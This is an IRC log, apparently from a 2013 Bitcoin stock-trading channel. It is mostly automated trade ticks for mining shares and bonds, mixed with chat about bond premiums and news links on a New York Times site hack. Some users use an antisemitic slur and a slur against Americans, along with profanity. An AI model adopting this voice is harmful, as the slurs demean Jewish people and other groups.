2.499 BTC [-] Aug 28 00:33:36 agreed Aug 28 00:34:40 [BTCTC] [TAT.ASICMINER] 3 @ 0.02447 = 0.0734 BTC [+] Aug 28 00:35:35 [BTCTC] [ASICMINER-PT] 1 @ 2.549 BTC [+] Aug 28 00:35:42 its obvious at this point that they have been quite purposeful in behaving this way Aug 28 00:35:49 [BTCTC] [ACTIVEMINING] 10 @ 0.00539 = 0.0539 BTC [-] Aug 28 00:35:50 [BTCTC] [ACTIVEMINING] 10 @ 0.005391 = 0.0539 BTC [+] Aug 28 00:36:15 certainly a possibility. Aug 28 00:36:41 http://www.reddit.com/r/BitcoinStocks/comments/1l5ng1/im_new_to_bitcoin_how_does_bitcoin_stocks_work/cbw02vu that was pretty good actually. Aug 28 00:36:43 accountt1234 comments on I'm new to bitcoin. How does bitcoin stocks work? Aug 28 00:36:47 [BTCTC] [ACTIVEMINING] 10 @ 0.005396 = 0.054 BTC [+] Aug 28 00:36:49 [BTCTC] [ACTIVEMINING] 470 @ 0.005396 = 2.5361 BTC [+] Aug 28 00:38:10 [BTCTC] [TAT.ASICMINER] 2 @ 0.02447 = 0.0489 BTC [+] Aug 28 00:38:48 [BTCTC] [TAT.ASICMINER] 10 @ 0.02351 = 0.2351 BTC [-] Aug 28 00:38:49 [BTCTC] [TAT.ASICMINER] 10 @ 0.0235 = 0.235 BTC [-] Aug 28 00:38:50 [MPEX] [S.MPOE] 5488 @ 0.00087322 = 4.7922 BTC [-] Aug 28 00:38:52 [BTCTC] [TAT.ASICMINER] 20 @ 0.02325 = 0.465 BTC [-] Aug 28 00:38:53 [MPEX] [S.MPOE] 2412 @ 0.00087485 = 2.1101 BTC [+] Aug 28 00:38:54 [BTCTC] [TAT.ASICMINER] 1 @ 0.0232 BTC [-] Aug 28 00:38:54 [BTCTC] [TAT.ASICMINER] 60 @ 0.0232 = 1.392 BTC [-] Aug 28 00:38:55 [BTCTC] [TAT.ASICMINER] 1 @ 0.02311 BTC [-] Aug 28 00:38:56 [BTCTC] [TAT.ASICMINER] 241 @ 0.02311 = 5.5695 BTC [-] Aug 28 00:39:23 [BTCTC] [BTC-GROWTH] 6 @ 0.09983 = 0.599 BTC [+] Aug 28 00:39:25 [BTCTC] [BTC-GROWTH] 25 @ 0.09982 = 2.4955 BTC [-] Aug 28 00:39:26 [BTCTC] [BTC-GROWTH] 16 @ 0.09981 = 1.597 BTC [-] Aug 28 00:39:27 [BTCTC] [BTC-GROWTH] 100 @ 0.0998 = 9.98 BTC [-] Aug 28 00:39:53 [HAVELOCK] [AM100] 6 @ 0.02625 = 0.1575 BTC [+] Aug 28 00:40:24 [BTCTC] [ACTIVEMINING] 10 @ 0.005392 = 0.0539 BTC [-] Aug 28 00:40:25 [BTCTC] [ACTIVEMINING] 29 @ 0.005393 = 0.1564 BTC [+] Aug 28 00:40:27 [BTCTC] [ACTIVEMINING] 1 @ 0.005397 BTC [+] Aug 28 00:40:27 [BTCTC] [ACTIVEMINING] 10 @ 0.005397 = 0.054 BTC [+] Aug 28 00:40:28 [BTCTC] [ACTIVEMINING] 1004 @ 0.005397 = 5.4186 BTC [+] Aug 28 00:40:29 [BTCTC] [ACTIVEMINING] 10 @ 0.005398 = 0.054 BTC [+] Aug 28 00:40:30 [BTCTC] [ACTIVEMINING] 30 @ 0.005398 = 0.1619 BTC [+] Aug 28 00:40:45 [BTCTC] [ASICMINER-PT] 1 @ 2.547 BTC [-] Aug 28 00:41:05 [BTCTC] [ACTIVEMINING] 59 @ 0.005399 = 0.3185 BTC [+] Aug 28 00:41:37 [BTCTC] [TAT.ASICMINER] 1 @ 0.02459 BTC [+] Aug 28 00:41:38 [BTCTC] [TAT.ASICMINER] 1 @ 0.0246 BTC [+] Aug 28 00:41:39 [BTCTC] [TAT.ASICMINER] 1 @ 0.0248 BTC [+] Aug 28 00:41:41 [BTCTC] [TAT.ASICMINER] 1 @ 0.02498 BTC [+] Aug 28 00:43:02 [BTCTC] [TAT.ASICMINER] 1 @ 0.02501 BTC [+] Aug 28 00:43:28 I don't know what I did to deserve this, but I have people spamming me now about to do on btct Aug 28 00:44:10 SELLL Aug 28 00:44:14 [BTCTC] [TAT.ASICMINER] 10 @ 0.02359 = 0.2359 BTC [-] Aug 28 00:44:15 [BTCTC] [TAT.ASICMINER] 2 @ 0.02359 = 0.0472 BTC [-] Aug 28 00:45:38 [BTCTC] [TAT.ASICMINER] 10 @ 0.02691 = 0.2691 BTC [+] Aug 28 00:45:40 [MPEX] [S.MPOE] 18304 @ 0.00087485 = 16.0133 BTC [+] Aug 28 00:46:55 ;;nethash Aug 28 00:46:56 550249.543365 Aug 28 00:47:20 you have probably been a very very naughty boy. Aug 28 00:47:38 .d Aug 28 00:47:42 motherfucker... Aug 28 00:47:45 ;;echo .d Aug 28 00:47:46 .d Aug 28 00:47:46 65750060.14908 | Next Diff in 1479 blocks | Estimated Change: 12.6101% in 8d 22h 57m 33s Aug 28 00:48:33 Jezzz: make your jew bot unignore me. thanks Aug 28 00:48:46 [BTCTC] [TAT.ASICMINER] 5 @ 0.02369 = 0.1185 BTC [-] Aug 28 00:50:15 [BTCTC] [ACTIVEMINING] 4 @ 0.005398 = 0.0216 BTC [-] Aug 28 00:50:40 .d Aug 28 00:50:40 65750060.14908 | Next Diff in 1479 blocks | Estimated Change: 12.6101% in 8d 22h 54m 39s Aug 28 00:51:09 [BTCTC] [TAT.ASICMINER] 5 @ 0.02651 = 0.1326 BTC [+] Aug 28 00:51:56 [BTCTC] [LABCOIN] 62 @ 0.003608 = 0.2237 BTC [+] Aug 28 00:51:58 [BTCTC] [LABCOIN] 76 @ 0.003607 = 0.2741 BTC [-] Aug 28 00:51:59 [BTCTC] [LABCOIN] 300 @ 0.003606 = 1.0818 BTC [-] Aug 28 00:52:00 [BTCTC] [LABCOIN] 5 @ 0.003605 = 0.018 BTC [-] Aug 28 00:52:01 [BTCTC] [LABCOIN] 2557 @ 0.003603 = 9.2129 BTC [-] Aug 28 00:52:05 [HAVELOCK] [AM1] 1 @ 2.63 BTC [-] Aug 28 00:52:15 [BTCTC] [ASICMINER-PT] 1 @ 2.585 BTC [+] Aug 28 00:52:55 [BTCTC] [LABCOIN] 74 @ 0.003603 = 0.2666 BTC [-] Aug 28 00:52:56 [BTCTC] [LABCOIN] 1000 @ 0.003602 = 3.602 BTC [-] Aug 28 00:52:58 [BTCTC] [LABCOIN] 327 @ 0.003602 = 1.1779 BTC [-] Aug 28 00:53:08 [BTCTC] [ASICMINER-PT] 1 @ 2.586 BTC [+] Aug 28 00:53:36 [HAVELOCK] [AM100] 84 @ 0.02625 = 2.205 BTC [+] Aug 28 00:53:54 [BTCTC] [ASICMINER-PT] 1 @ 2.509 BTC [-] Aug 28 00:54:08 [BTCTC] [LABCOIN] 5673 @ 0.003602 = 20.4341 BTC [-] Aug 28 00:54:09 [BTCTC] [DMS.SELLING] 12 @ 0.0123 = 0.1476 BTC [-] Aug 28 00:54:10 http://www.reddit.com/r/BitcoinStocks/comments/1l7rd1/the_analysis_of_a_failure_asicminer/cbwk0ti lol who is this? Aug 28 00:54:11 [BTCTC] [DMS.SELLING] 105 @ 0.0123 = 1.2915 BTC [-] Aug 28 00:54:12 [BTCTC] [LABCOIN] 3527 @ 0.0036 = 12.6972 BTC [-] Aug 28 00:54:12 accountt1234 comments on The analysis of a failure : Asicminer Aug 28 00:54:12 [BTCTC] [LABCOIN] 8 @ 0.003551 = 0.0284 BTC [-] Aug 28 00:54:13 [BTCTC] [LABCOIN] 35 @ 0.00355 = 0.1243 BTC [-] Aug 28 00:54:14 [BTCTC] [LABCOIN] 3025 @ 0.003533 = 10.6873 BTC [-] Aug 28 00:54:15 [BTCTC] [LABCOIN] 100 @ 0.003532 = 0.3532 BTC [-] Aug 28 00:54:16 [BTCTC] [LABCOIN] 7000 @ 0.003532 = 24.724 BTC [-] Aug 28 00:54:17 [BTCTC] [LABCOIN] 5000 @ 0.00353 = 17.65 BTC [-] Aug 28 00:54:18 [BTCTC] [LABCOIN] 3497 @ 0.003525 = 12.3269 BTC [-] Aug 28 00:54:19 [BTCTC] [LABCOIN] 4272 @ 0.003504 = 14.9691 BTC [-] Aug 28 00:54:20 [BTCTC] [LABCOIN] 2368 @ 0.003503 = 8.2951 BTC [-] Aug 28 00:54:20 [BTCTC] [LABCOIN] 100 @ 0.003502 = 0.3502 BTC [-] Aug 28 00:54:21 [BTCTC] [LABCOIN] 138 @ 0.003501 = 0.4831 BTC [-] Aug 28 00:54:22 [BTCTC] [LABCOIN] 257 @ 0.003501 = 0.8998 BTC [-] Aug 28 00:54:24 [MPEX] [S.MPOE] 1596 @ 0.00087648 = 1.3989 BTC [+] Aug 28 00:56:31 [HAVELOCK] [AM100] 3 @ 0.02654 = 0.0796 BTC [+] Aug 28 00:57:49 [BTCTC] [ASICMINER-PT] 1 @ 2.459 BTC [-] Aug 28 00:58:20 [BTCTC] [ASICMINER-PT] 1 @ 2.5 BTC [+] Aug 28 00:58:21 [BTCTC] [DMS.PURCHASE] 1 @ 0.01557 BTC [-] Aug 28 00:58:25 [BTCTC] [DMS.MINING] 2 @ 0.00355 = 0.0071 BTC [+] Aug 28 00:59:47 [BTCTC] [ASICMINER-PT] 1 @ 2.501 BTC [+] Aug 28 01:01:30 [BTCTC] [ASICMINER-PT] 1 @ 2.6 BTC [+] Aug 28 01:02:40 [BTCTC] [ASICMINER-PT] 1 @ 2.502 BTC [-] Aug 28 01:05:11 [BTCTC] [TAT.ASICMINER] 1 @ 0.02399 BTC [-] Aug 28 01:07:28 [BTCTC] [ASICMINER-PT] 1 @ 2.504 BTC [+] Aug 28 01:08:34 thestringpuller here's one for your list : " Color notwithstanding, as teens aren’t old enough to be a particular color other than worm." Aug 28 01:08:51 [BTCTC] [TAT.ASICMINER] 1 @ 0.02551 BTC [+] Aug 28 01:09:42 [BTCTC] [TAT.MINIGAME] 25 @ 0.0002601 = 0.0065 BTC [+] Aug 28 01:09:43 [BTCTC] [TAT.MINIGAME] 10 @ 0.0002601 = 0.0026 BTC [+] Aug 28 01:09:44 [BTCTC] [TAT.MINIGAME] 15 @ 0.0002645 = 0.004 BTC [+] Aug 28 01:10:25 [BTCTC] [ASICMINER-PT] 1 @ 2.599 BTC [+] Aug 28 01:11:20 [BTCTC] [BTC-GROWTH] 7 @ 0.09971 = 0.698 BTC [-] Aug 28 01:11:22 [BTCTC] [BTC-GROWTH] 24 @ 0.0997 = 2.3928 BTC [-] Aug 28 01:11:23 [BTCTC] [BTC-GROWTH] 8 @ 0.0995 = 0.796 BTC [-] Aug 28 01:11:24 [BTCTC] [BTC-GROWTH] 1 @ 0.0991 BTC [-] Aug 28 01:11:36 http://blog.erratasec.com/2013/08/nasdaq-is-neither-in-new-york-nor-on.html Aug 28 01:11:38 Errata Security: Nasdaq is neither in New York nor on the Internet Aug 28 01:12:00 [HAVELOCK] [AM1] 1 @ 2.63 BTC [-] Aug 28 01:13:45 [MPEX] [S.MG] 5000 @ 0.0002 = 1 BTC [-] Aug 28 01:13:50 [MPEX] [S.MG] 7800 @ 0.00019 = 1.482 BTC [-] Aug 28 01:13:52 [MPEX] [S.MG] 11014 @ 0.00018001 = 1.9826 BTC [-] Aug 28 01:14:17 [BTCTC] [TAT.ASICMINER] 1 @ 0.02397 BTC [-] Aug 28 01:14:18 [BTCTC] [TAT.ASICMINER] 1 @ 0.02398 BTC [+] Aug 28 01:14:19 nasdaq must be a scam Aug 28 01:14:53 [BTCTC] [TAT.ASICMINER] 4 @ 0.02399 = 0.096 BTC [+] Aug 28 01:15:20 ya well who the fuck is going to put up pictures of carteret nj Aug 28 01:15:43 [BTCTC] [BASIC-MINING] 10 @ 0.2199 = 2.199 BTC [+] Aug 28 01:16:04 NJ is just a shit hole Aug 28 01:18:01 [BTCTC] [ACTIVEMINING] 3 @ 0.005398 = 0.0162 BTC [-] Aug 28 01:18:02 [BTCTC] [ACTIVEMINING] 22 @ 0.005399 = 0.1188 BTC [+] Aug 28 01:18:03 [BTCTC] [ACTIVEMINING] 400 @ 0.005399 = 2.1596 BTC [+] Aug 28 01:18:04 [BTCTC] [ACTIVEMINING] 17 @ 0.005399 = 0.0918 BTC [+] Aug 28 01:18:23 [BTCTC] [ASICMINER-PT] 1 @ 2.464 BTC [-] Aug 28 01:18:40 [BTCTC] [ACTIVEMINING] 59 @ 0.0054 = 0.3186 BTC [+] Aug 28 01:18:41 [BTCTC] [ACTIVEMINING] 42 @ 0.0054 = 0.2268 BTC [+] Aug 28 01:18:42 [BTCTC] [ACTIVEMINING] 50 @ 0.0054 = 0.27 BTC [+] Aug 28 01:18:43 [BTCTC] [ACTIVEMINING] 65 @ 0.0054 = 0.351 BTC [+] Aug 28 01:18:44 [BTCTC] [ACTIVEMINING] 714 @ 0.0054 = 3.8556 BTC [+] Aug 28 01:19:28 [BTCTC] [ASICMINER-PT] 1 @ 2.463 BTC [-] Aug 28 01:19:41 [BTCTC] [ACTIVEMINING] 800 @ 0.0054 = 4.32 BTC [+] Aug 28 01:20:07 [BTCTC] [ASICMINER-PT] 1 @ 2.461 BTC [-] Aug 28 01:20:19 [BTCTC] [TAT.ASICMINER] 5 @ 0.02601 = 0.1301 BTC [+] Aug 28 01:20:52 [BTCTC] [ASICMINER-PT] 2 @ 2.461 = 4.922 BTC [-] Aug 28 01:21:31 [BTCTC] [ASICMINER-PT] 2 @ 2.458 = 4.916 BTC [-] Aug 28 01:21:32 [BTCTC] [ASICMINER-PT] 1 @ 2.458 BTC [-] Aug 28 01:21:34 [BTCTC] [ASICMINER-PT] 4 @ 2.458 = 9.832 BTC [-] Aug 28 01:22:19 [BTCTC] [ASICMINER-PT] 3 @ 2.457 = 7.371 BTC [-] Aug 28 01:22:21 [BTCTC] [ASICMINER-PT] 10 @ 2.457 = 24.57 BTC [-] Aug 28 01:22:44 [BTCTC] [LABCOIN] 25 @ 0.003521 = 0.088 BTC [+] Aug 28 01:22:46 [BTCTC] [LABCOIN] 100 @ 0.00352 = 0.352 BTC [-] Aug 28 01:22:47 [BTCTC] [LABCOIN] 275 @ 0.003506 = 0.9642 BTC [-] Aug 28 01:22:47 [BTCTC] [LABCOIN] 100 @ 0.003505 = 0.3505 BTC [-] Aug 28 01:22:48 [BTCTC] [LABCOIN] 1000 @ 0.003503 = 3.503 BTC [-] Aug 28 01:23:07 [BTCTC] [ASICMINER-PT] 6 @ 2.459 = 14.754 BTC [+] Aug 28 01:23:17 [BTCTC] [ACTIVEMINING] 123 @ 0.005409 = 0.6653 BTC [+] Aug 28 01:23:18 [BTCTC] [ACTIVEMINING] 131 @ 0.005425 = 0.7107 BTC [+] Aug 28 01:23:19 [BTCTC] [ACTIVEMINING] 100 @ 0.005427 = 0.5427 BTC [+] Aug 28 01:23:21 [BTCTC] [ACTIVEMINING] 546 @ 0.005428 = 2.9637 BTC [+] Aug 28 01:23:46 [BTCTC] [ACTIVEMINING] 50 @ 0.005428 = 0.2714 BTC [+] Aug 28 01:24:25 [BTCTC] [ASICMINER-PT] 16 @ 2.456 = 39.296 BTC [-] Aug 28 01:24:34 [BTCTC] [ASICMINER-PT] 5 @ 2.454 = 12.27 BTC [-] Aug 28 01:25:08 [HAVELOCK] [XBOND] 10 @ 0.00139 = 0.0139 BTC [-] Aug 28 01:25:10 [BTCTC] [ASICMINER-PT] 5 @ 2.454 = 12.27 BTC [-] Aug 28 01:25:12 wtf Aug 28 01:26:32 ? Aug 28 01:26:49 ? Aug 28 01:26:54 ! Aug 28 01:26:58 [BTCTC] [LABCOIN] 2 @ 0.003502 = 0.007 BTC [-] Aug 28 01:27:15 [HAVELOCK] [XBOND] 10 @ 0.00139 = 0.0139 BTC [-] Aug 28 01:27:27 i mean i get some kinda cookie, no? Aug 28 01:27:30 ... Aug 28 01:27:53 lolwut Aug 28 01:27:58 You get the "WTF are they doing" award. Aug 28 01:28:01 is thios the thing that's worth 1.19 tops ? Aug 28 01:28:16 [BTCTC] [DMS.MINING] 2 @ 0.00355 = 0.0071 BTC [+] Aug 28 01:28:17 It's the thing worth 0.001 Aug 28 01:28:18 this is a .001 face value paying 18.25% AY Aug 28 01:28:28 39% premium Aug 28 01:28:29 btcinvest had a classic dip Aug 28 01:28:35 [BTCTC] [ASICMINER-PT] 1 @ 2.588 BTC [+] Aug 28 01:28:36 [BTCTC] [ASICMINER-PT] 1 @ 2.589 BTC [+] Aug 28 01:28:38 0.001 or something Aug 28 01:28:38 [BTCTC] [ASICMINER-PT] 1 @ 2.59 BTC [+] Aug 28 01:28:44 aha Aug 28 01:28:57 2yrs premium! step right up! Aug 28 01:29:52 [HAVELOCK] [AM1] 1 @ 2.49 BTC [-] Aug 28 01:30:01 [HAVELOCK] [AM1] 1 @ 2.48999999 BTC [-] Aug 28 01:30:34 so whats the xcrowd thing? Aug 28 01:30:58 2yrs premium miners? Aug 28 01:31:16 moar "We too" scamfest i guess. Aug 28 01:32:19 I think the guy still has no team behind the product at all Aug 28 01:32:53 [HAVELOCK] [AM100] 9 @ 0.026 = 0.234 BTC [-] Aug 28 01:32:55 [HAVELOCK] [AM100] 6 @ 0.0259 = 0.1554 BTC [-] Aug 28 01:32:58 [HAVELOCK] [AM100] 6 @ 0.0258 = 0.1548 BTC [-] Aug 28 01:33:00 [HAVELOCK] [AM100] 10 @ 0.0251 = 0.251 BTC [-] Aug 28 01:33:01 [HAVELOCK] [AM100] 20 @ 0.025 = 0.5 BTC [-] Aug 28 01:36:34 TAT: can I buy some xbond too? Aug 28 01:36:48 I payz 3 year premium! Aug 28 01:42:06 [BTCTC] [LABCOIN] 840 @ 0.00355 = 2.982 BTC [+] Aug 28 01:43:17 [BTCTC] [ACTIVEMINING] 3 @ 0.005398 = 0.0162 BTC [-] Aug 28 01:43:18 [BTCTC] [ACTIVEMINING] 2 @ 0.005398 = 0.0108 BTC [-] Aug 28 01:43:19 [BTCTC] [ACTIVEMINING] 250 @ 0.005201 = 1.3003 BTC [-] Aug 28 01:43:20 [BTCTC] [ACTIVEMINING] 1000 @ 0.0052 = 5.2 BTC [-] Aug 28 01:44:35 [BTCTC] [LABCOIN] 20 @ 0.003505 = 0.0701 BTC [-] Aug 28 01:44:50 [BTCTC] [ACTIVEMINING] 64 @ 0.005151 = 0.3297 BTC [-] Aug 28 01:44:51 [BTCTC] [ACTIVEMINING] 132 @ 0.00515 = 0.6798 BTC [-] Aug 28 01:44:53 [BTCTC] [ACTIVEMINING] 125 @ 0.00515 = 0.6438 BTC [-] Aug 28 01:44:54 [BTCTC] [ACTIVEMINING] 113 @ 0.005105 = 0.5769 BTC [-] Aug 28 01:44:55 [BTCTC] [ACTIVEMINING] 100 @ 0.005104 = 0.5104 BTC [-] Aug 28 01:44:56 [BTCTC] [ACTIVEMINING] 46 @ 0.005102 = 0.2347 BTC [-] Aug 28 01:44:57 [BTCTC] [ACTIVEMINING] 308 @ 0.0051 = 1.5708 BTC [-] Aug 28 01:44:58 [BTCTC] [ACTIVEMINING] 2208 @ 0.005084 = 11.2255 BTC [-] Aug 28 01:44:59 [BTCTC] [ACTIVEMINING] 552 @ 0.005083 = 2.8058 BTC [-] Aug 28 01:45:00 [BTCTC] [ACTIVEMINING] 1021 @ 0.005081 = 5.1877 BTC [-] Aug 28 01:45:01 [BTCTC] [ACTIVEMINING] 3938 @ 0.00508 = 20.005 BTC [-] Aug 28 01:46:27 [HAVELOCK] [SDSTM] 1 @ 0.0045 BTC [+] Aug 28 01:48:22 [BTCTC] [ASICMINER-PT] 1 @ 2.5 BTC [-] Aug 28 01:51:01 [HAVELOCK] [AM1] 2 @ 2.48999999 = 4.98 BTC [-] Aug 28 01:54:08 TAT: can I buy some xbond too? <<< i have none for sale Aug 28 01:54:37 i think one lesson here is, the going interest rate for bitcoin bonds is officially too high Aug 28 01:54:48 maybe next time will be an XBOND2 at 15% Aug 28 01:55:10 or less Aug 28 02:00:30 [BTCTC] [LABCOIN] 2 @ 0.003534 = 0.0071 BTC [+] Aug 28 02:00:32 [BTCTC] [LABCOIN] 10 @ 0.003535 = 0.0354 BTC [+] Aug 28 02:00:33 [BTCTC] [LABCOIN] 88 @ 0.003538 = 0.3113 BTC [+] Aug 28 02:01:27 [BTCTC] [LABCOIN] 100 @ 0.003538 = 0.3538 BTC [+] Aug 28 02:01:38 [BTCTC] [ASICMINER-PT] 1 @ 2.575 BTC [+] Aug 28 02:01:39 [BTCTC] [ASICMINER-PT] 1 @ 2.576 BTC [+] Aug 28 02:01:41 [BTCTC] [ASICMINER-PT] 1 @ 2.578 BTC [+] Aug 28 02:01:41 [BTCTC] [ASICMINER-PT] 1 @ 2.58 BTC [+] Aug 28 02:01:42 [BTCTC] [ASICMINER-PT] 1 @ 2.594 BTC [+] Aug 28 02:03:04 [BTCTC] [ACTIVEMINING] 150 @ 0.005411 = 0.8117 BTC [+] Aug 28 02:03:19 and the second one is people are stupid Aug 28 02:04:22 Mine are 10.95% per year Aug 28 02:04:31 and selling, albeit slowly Aug 28 02:07:08 [MPEX] [S.MPOE] 2354 @ 0.00087344 = 2.0561 BTC [-] Aug 28 02:07:10 TAT: hey, if people are paying that kind of premium, you'd have to be motivated to issue *more* xbond Aug 28 02:07:19 [MPEX] [S.MPOE] 4568 @ 0.00087657 = 4.0042 BTC [+] Aug 28 02:07:21 [MPEX] [S.MPOE] 9028 @ 0.00087669 = 7.9148 BTC [+] Aug 28 02:07:49 reality is probably less exciting -- I'm guessing people are buying without any understanding of what's backing it Aug 28 02:09:16 it's something i've gone back and forth over Aug 28 02:09:29 and i simply have the btc i need right now Aug 28 02:10:10 and short of arbing issuance against calling back, there arent a lot of options Aug 28 02:10:21 and if i do that it hurts the non-idiots Aug 28 02:10:37 I'm missing out on all the fun Aug 28 02:10:41 [BTCTC] [ASICMINER-PT] 1 @ 2.473 BTC [-] Aug 28 02:10:53 but I have work to do these days -- insane schedule forcing me to ignore BTC Aug 28 02:11:00 [BTCTC] [TAT.ASICMINER] 21 @ 0.02369 = 0.4975 BTC [-] Aug 28 02:11:15 [BTCTC] [ASICMINER-PT] 1 @ 2.472 BTC [-] Aug 28 02:11:47 [BTCTC] [ASICMINER-PT] 2 @ 2.471 = 4.942 BTC [-] Aug 28 02:12:31 [BTCTC] [ASICMINER-PT] 1 @ 2.47 BTC [-] Aug 28 02:13:02 [BTCTC] [ASICMINER-PT] 12 @ 2.47 = 29.64 BTC [-] Aug 28 02:13:10 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.001115 BTC [-] Aug 28 02:15:08 [BTCTC] [TAT.ASICMINER] 21 @ 0.02531 = 0.5315 BTC [+] Aug 28 02:15:52 https://lists.dns-oarc.net/pipermail/dns-operations/2013-August/010617.html Aug 28 02:15:55 [dns-operations] Request To Clear Cache: NYTimes.com Aug 28 02:16:35 [BTCTC] [LABCOIN] 250 @ 0.003538 = 0.8845 BTC [+] Aug 28 02:16:36 [BTCTC] [LABCOIN] 1000 @ 0.003539 = 3.539 BTC [+] Aug 28 02:19:58 [BTCTC] [BITVPS] 60 @ 0.00245 = 0.147 BTC [-] Aug 28 02:19:59 [BTCTC] [BITVPS] 249 @ 0.002401 = 0.5978 BTC [-] Aug 28 02:20:01 [BTCTC] [BITVPS] 1 @ 0.002401 BTC [-] Aug 28 02:23:13 [BTCTC] [TAT.ASICMINER] 20 @ 0.02374 = 0.4748 BTC [-] Aug 28 02:23:32 [HAVELOCK] [CFIG] 1 @ 0.19 BTC [-] Aug 28 02:24:39 http://www.theverge.com/2013/8/27/4665230/new-york-times-website-taken-down-sea-suspected Aug 28 02:24:43 New York Times website taken down by hack, Syrian Electronic Army involvement suspected (update) | T Aug 28 02:25:15 [HAVELOCK] [CFIG] 2 @ 0.18 = 0.36 BTC [-] Aug 28 02:25:18 [HAVELOCK] [CFIG] 5 @ 0.16 = 0.8 BTC [-] Aug 28 02:25:41 [HAVELOCK] [LABCO] 5 @ 0.00327 = 0.0164 BTC [-] Aug 28 02:25:55 [BTCTC] [LABCOIN] 1 @ 0.003574 BTC [+] Aug 28 02:25:58 [BTCTC] [TAT.ASICMINER] 20 @ 0.02511 = 0.5022 BTC [+] Aug 28 02:27:40 http://www.theverge.com/2013/5/24/4363140/syrian-electronic-army-hackers Aug 28 02:27:42 Syrian Electronic Army: pro-government propaganda, or just trolling for lulz? | The Verge Aug 28 02:27:47 ffs Aug 28 02:28:07 hope its for teh lulz Aug 28 02:28:10 do any of you amerifags actually buy this syrian hackers shit Aug 28 02:28:24 [BTCTC] [DMS.SELLING] 10 @ 0.01223 = 0.1223 BTC [-] Aug 28 02:28:26 [BTCTC] [DMS.SELLING] 98 @ 0.01223 = 1.1985 BTC [-] Aug 28 02:28:58 [HAVELOCK] [CFIG] 10 @ 0.19 = 1.9 BTC [+] Aug 28 02:29:04 http://www.theverge.com/2013/8/27/4664116/janet-napolitano-farewell-address-warns-of-impending-cyber-attack Aug 28 02:29:07 Homeland Security director warns of catastrophic cyberattack in farewell speech | The Verge Aug 28 02:29:28 [BTCTC] [LABCOIN] 543 @ 0.003501 = 1.901 BTC [-] Aug 28 02:29:28 like americans follow syrian anything... Aug 28 02:29:29 [BTCTC] [LABCOIN] 936 @ 0.0035 = 3.276 BTC [-] Aug 28 02:29:30 [BTCTC] [LABCOIN] 7500 @ 0.0035 = 26.25 BTC [-] Aug 28 02:29:34 true Aug 28 02:29:52 its all WMDs and narcoterrorism Aug 28 02:30:01 i can some up syria from over pretty easily Aug 28 02:30:26 Is that where the next war is? Lemme know when it starts and how I should feel about it when it does. Aug 28 02:30:40 its easy to forget 'murica doesn't read, let alone read news Aug 28 02:30:44 that covers 99% of US Aug 28 02:30:46 i can't believe that napoletano idjit made it to the end of term Aug 28 02:32:03 [BTCTC] [COGNITIVE] 1 @ 0.3361 BTC [-] Aug 28 02:32:49 [HAVELOCK] [AM100] 6 @ 0.02460001 = 0.1476 BTC [-] Aug 28 02:32:51 [HAVELOCK] [AM100] 1 @ 0.0246 BTC [-] Aug 28 02:32:54 [HAVELOCK] [AM100] 2 @ 0.02430001 = 0.0486 BTC [-] Aug 28 02:32:56 [HAVELOCK] [AM100] 10 @ 0.02425 = 0.2425 BTC [-] Aug 28 02:32:58 [HAVELOCK] [AM100] 25 @ 0.02421001 = 0.6053 BTC [-] Aug 28 02:33:00 [HAVELOCK] [AM100] 7 @ 0.02406 = 0.1684 BTC [-] Aug 28 02:33:02 [HAVELOCK] [AM100] 20 @ 0.02401 = 0.4802 BTC [-] Aug 28 02:33:04 [HAVELOCK] [AM100] 25 @ 0.02401 = 0.6003 BTC [-] Aug 28 02:33:10 [HAVELOCK] [AM1] 1 @ 2.3001 BTC [-] Aug 28 02:33:21 [HAVELOCK] [AM1] 1 @ 2.30000001 BTC [-] Aug 28 02:33:41 [BTCTC] [TAT.ASICMINER] 1 @ 0.02324 BTC [-] Aug 28 02:33:43 [BTCTC] [TAT.ASICMINER] 3 @ 0.02323 = 0.0697 BTC [-] Aug 28 02:33:45 [BTCTC] [TAT.ASICMINER] 32 @ 0.02322 = 0.743 BTC [-] Aug 28 02:33:46 [BTCTC] [TAT.ASICMINER] 50 @ 0.0232 = 1.16 BTC [-] Aug 28 02:33:47 [BTCTC] [TAT.ASICMINER] 6 @ 0.02316 = 0.139 BTC [-] Aug 28 02:33:49 [BTCTC] [TAT.ASICMINER] 5 @ 0.02315 = 0.1158 BTC [-] Aug 28 02:33:50 [BTCTC] [TAT.ASICMINER] 40 @ 0.02315 = 0.926 BTC [-] Aug 28 02:33:51 [BTCTC] [TAT.ASICMINER] 5 @ 0.02311 = 0.1156 BTC [-] Aug 28 02:33:52 [BTCTC] [TAT.ASICMINER] 115 @ 0.02311 = 2.6577 BTC [-] Aug 28 02:33:53 [BTCTC] [TAT.ASICMINER] 65 @ 0.02311 = 1.5022 BTC [-] Aug 28 02:33:54 [BTCTC] [TAT.ASICMINER] 22 @ 0.023 = 0.506 BTC [-] Aug 28 02:33:54 [BTCTC] [TAT.ASICMINER] 60 @ 0.023 = 1.38 BTC [-] Aug 28 02:33:55 [BTCTC] [TAT.ASICMINER] 10 @ 0.023 = 0.23 BTC [-] Aug 28 02:33:57 [BTCTC] [TAT.ASICMINER] 5 @ 0.023 = 0.115 BTC [-] Aug 28 02:33:58 [BTCTC] [TAT.ASICMINER] 50 @ 0.023 = 1.15 BTC [-] Aug 28 02:33:59 [BTCTC] [TAT.ASICMINER] 7 @ 0.023 = 0.161 BTC [-] Aug 28 02:34:19 cybernarcoterrorists attacking AM Aug 28 02:34:46 its an epidemic Aug 28 02:35:08 <[\\\]> bunch of dumping of AM on both places Aug 28 02:35:53 [BTCTC] [ASICMINER-PT] 1 @ 2.49 BTC [+] Aug 28 02:35:54 [BTCTC] [ASICMINER-PT] 1 @ 2.499 BTC [+] Aug 28 02:35:55 [BTCTC] [ASICMINER-PT] 1 @ 2.5 BTC [+] Aug 28 02:35:56 [BTCTC] [ASICMINER-PT] 1 @ 2.51 BTC [+] Aug 28 02:35:57 [BTCTC] [ASICMINER-PT] 1 @ 2.53 BTC [+] Aug 28 02:35:58 [BTCTC] [ASICMINER-PT] 3 @ 2.545 = 7.635 BTC [+] Aug 28 02:35:58 [BTCTC] [ASICMINER-PT] 1 @ 2.549 BTC [+] Aug 28 02:36:33 oh, c'mon mircea_popescu. she *had* to finish her term, it's how the establishment legitimizes its selection of minorities to hide their nefarious backroom dealings. Aug 28 02:36:48 but she was wildly inept. Aug 28 02:36:48 [BTCTC] [BASIC-MINING] 1 @ 0.2105 BTC [-] Aug 28 02:37:05 "you too can become an important person in america! buy these myths!" Aug 28 02:37:45 our president is also wildly inept, and similarly a figurehead for a vast army of the vastly more competent. Aug 28 02:37:49 [BTCTC] [ASICMINER-PT] 1 @ 2.459 BTC [-] Aug 28 